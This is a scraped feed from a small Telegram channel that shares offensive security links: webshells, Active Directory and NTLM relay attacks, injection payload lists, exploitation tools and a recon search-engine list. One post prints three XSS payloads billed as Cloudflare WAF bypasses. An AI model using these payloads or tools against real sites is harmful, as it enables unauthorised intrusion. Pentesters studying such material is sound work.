hackspace – Telegram
hackspace
@hackspace
157 subscribers
279 photos
75 videos
24 files
999 links
hackspace
Download Telegram
About
Blog
Apps
Platform
Join
hackspace
157 subscribers
hackspace
https://github.com/p0dalirius/Tomcat-application-webshell
GitHub
GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers.
A webshell application and interactive shell for pentesting Apache Tomcat servers. - p0dalirius/Tomcat-webshell-application
49 views
hackspace
https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
Medium
Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)
In this blog post, we’ll dive into a recently patched Active Directory Domain Privilege Escalation vulnerability that I reported through…
51 views
hackspace
Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
Akamai
Remote Code Execution Vulnerabilities in RPC | Akamai Blog | Akamai
Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime:
CVE-2022-24492 and CVE-2022-24528…
57 views
hackspace
57 views
hackspace
https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
Unit 42
Emotet Summary: November 2021 Through January 2022
We review recent activity from the Emotet malware family, covering changes in Emotet operations since its revival in November 2021.
58 views
hackspace
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks - Praetorian
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
Praetorian
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
Overview This article describes methods by which an attacker can induce a victim user into authenticating using the NT Lan Manager (NTLM) Authentication Protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
72 views
hackspace
👍1
75 views
hackspace
GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
https://github.com/payloadbox/sql-injection-payload-list
69 views
hackspace
Some Cloudflare's latest XSS Bypass:

XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS

XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>

XSS"><input %00 onControl hello oninput=confirm(domain) x>
55 views
hackspace
https://github.com/R3dy/capsulecorp-pentest
GitHub
GitHub - R3dy/capsulecorp-pentest: Vagrant VirtualBox environment for conducting an internal network penetration test
Vagrant VirtualBox environment for conducting an internal network penetration test - R3dy/capsulecorp-pentest
55 views
hackspace
Pentesting_Active_directory - XMind - Mind Mapping Software
https://www.xmind.net/m/5dypm8/
👍1
75 views
hackspace
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
https://github.com/epi052/feroxbuster
GitHub
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
A fast, simple, recursive content discovery tool written in Rust. - epi052/feroxbuster
63 views
hackspace
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
GitHub
GitHub - RistBS/Awesome-RedTeam-Cheatsheet: Red Team Cheatsheet in constant expansion.
Red Team Cheatsheet in constant expansion. Contribute to RistBS/Awesome-RedTeam-Cheatsheet development by creating an account on GitHub.
56 views
hackspace
https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb
Gist
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure - Workstation-Takeover.md
47 views
hackspace
Best search 🔎 engines for Pentesters and Security Professionals.

→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io
68 views
hackspace
GitHub - mzfr/liffy: Local file inclusion exploitation tool
https://github.com/mzfr/liffy
GitHub
GitHub - mzfr/liffy: Local file inclusion exploitation tool
Local file inclusion exploitation tool. Contribute to mzfr/liffy development by creating an account on GitHub.
🔥1
49 views
hackspace
https://github.com/Wh04m1001/DFSCoerce
GitHub
GitHub - Wh04m1001/DFSCoerce
Contribute to Wh04m1001/DFSCoerce development by creating an account on GitHub.
54 views
hackspace
51 views
hackspace
GitHub - Cracked5pider/Ekko: Sleep Obfuscation
https://github.com/Cracked5pider/Ekko
GitHub
GitHub - Cracked5pider/Ekko: Sleep Obfuscation
Sleep Obfuscation. Contribute to Cracked5pider/Ekko development by creating an account on GitHub.
52 views
hackspace
MSRPC-to-ATTACK/MS-DFSNM.md at main · jsecurity101/MSRPC-to-ATTACK · GitHub
https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DFSNM.md
GitHub
MSRPC-to-ATTACK/documents/MS-DFSNM.md at main · jsecurity101/MSRPC-to-ATTACK
A repository that maps commonly used attacks using MSRPC protocols to ATT&CK - jsecurity101/MSRPC-to-ATTACK
50 views
hackspace
New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain
https://thehackernews.com/2022/06/new-ntlm-relay-attack-lets-attackers.html?m=1
51 views